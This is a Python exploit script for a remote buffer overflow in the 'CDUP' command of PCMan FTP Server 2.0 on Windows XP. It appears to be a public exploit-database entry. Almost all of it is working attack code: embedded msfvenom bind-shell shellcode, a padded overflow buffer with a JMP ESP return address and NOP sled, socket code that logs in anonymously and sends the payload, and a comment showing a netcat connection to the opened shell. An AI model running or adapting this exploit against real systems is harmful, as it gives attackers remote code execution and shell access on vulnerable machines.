#!/usr/bin/python import socket, sys, os, time print "\n===============================\n" print " PCMan FTP Server 2.0 - 'CDUP' Remote Buffer Overflow \n " print " Date: 23/03/2019 \n " print " Affected Software: PCMan 2.0 \n " print " Tested on Mincrsoft Windows XP Professional Version 2002 SP2 \n " print " Author: Sachin Wagh \n " print " Twitter: @tiger_tigerboy \n " print "=================================\n" #msfvenom -p windows/shell_bind_tcp LPORT=1144 -b '\x0a\x00\x0d' -f c #nc taget_ip 4444 shellcode=("\xbb\xb6\x9b\xb7\xa8\xda\xdf\xd9\x74\x24\xf4\x5a\x29\xc9\xb1" "\x53\x83\xea\xfc\x31\x5a\x0e\x03\xec\x95\x55\x5d\xec\x42\x1b" "\x9e\x0c\x93\x7c\x16\xe9\xa2\xbc\x4c\x7a\x94\x0c\x06\x2e\x19" "\xe6\x4a\xda\xaa\x8a\x42\xed\x1b\x20\xb5\xc0\x9c\x19\x85\x43" "\x1f\x60\xda\xa3\x1e\xab\x2f\xa2\x67\xd6\xc2\xf6\x30\x9c\x71" "\xe6\x35\xe8\x49\x8d\x06\xfc\xc9\x72\xde\xff\xf8\x25\x54\xa6" "\xda\xc4\xb9\xd2\x52\xde\xde\xdf\x2d\x55\x14\xab\xaf\xbf\x64" "\x54\x03\xfe\x48\xa7\x5d\xc7\x6f\x58\x28\x31\x8c\xe5\x2b\x86" "\xee\x31\xb9\x1c\x48\xb1\x19\xf8\x68\x16\xff\x8b\x67\xd3\x8b" "\xd3\x6b\xe2\x58\x68\x97\x6f\x5f\xbe\x11\x2b\x44\x1a\x79\xef" "\xe5\x3b\x27\x5e\x19\x5b\x88\x3f\xbf\x10\x25\x2b\xb2\x7b\x22" "\x98\xff\x83\xb2\xb6\x88\xf0\x80\x19\x23\x9e\xa8\xd2\xed\x59" "\xce\xc8\x4a\xf5\x31\xf3\xaa\xdc\xf5\xa7\xfa\x76\xdf\xc7\x90" "\x86\xe0\x1d\x0c\x8e\x47\xce\x33\x73\x37\xbe\xf3\xdb\xd0\xd4" "\xfb\x04\xc0\xd6\xd1\x2d\x69\x2b\xda\x40\x36\xa2\x3c\x08\xd6" "\xe2\x97\xa4\x14\xd1\x2f\x53\x66\x33\x18\xf3\x2f\x55\x9f\xfc" "\xaf\x73\xb7\x6a\x24\x90\x03\x8b\x3b\xbd\x23\xdc\xac\x4b\xa2" "\xaf\x4d\x4b\xef\x47\xed\xde\x74\x97\x78\xc3\x22\xc0\x2d\x35" "\x3b\x84\xc3\x6c\x95\xba\x19\xe8\xde\x7e\xc6\xc9\xe1\x7f\x8b" "\x76\xc6\x6f\x55\x76\x42\xdb\x09\x21\x1c\xb5\xef\x9b\xee\x6f" "\xa6\x70\xb9\xe7\x3f\xbb\x7a\x71\x40\x96\x0c\x9d\xf1\x4f\x49" "\xa2\x3e\x18\x5d\xdb\x22\xb8\xa2\x36\xe7\xc8\xe8\x1a\x4e\x41" "\xb5\xcf\xd2\x0c\x46\x3a\x10\x29\xc5\xce\xe9\xce\xd5\xbb\xec") target = sys.argv[1] port = int(sys.argv[2]) evil="A"*2006 evil+="\x27\xb1\xfa\x77" #SHLWAPI.dll this dll have to JMP to ESP address evil+="\x90"*20 evil+=shellcode #evil+="\x90"*(2220-len(evil)) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((target,port)) #Connect to FTP server s.recv(1024) #Receive 1024 bytes from FTP server print "[+] Payload Sent Successfully" s.send('USER anonymous\r\n') s.recv(1024) s.send('PASS anonymous\r\n') s.recv(1024) s.send('CDUP ' + evil + '\r\n') #Send CDUP vulnerable command with our evil data s.recv(1024) s.close() #Close the socket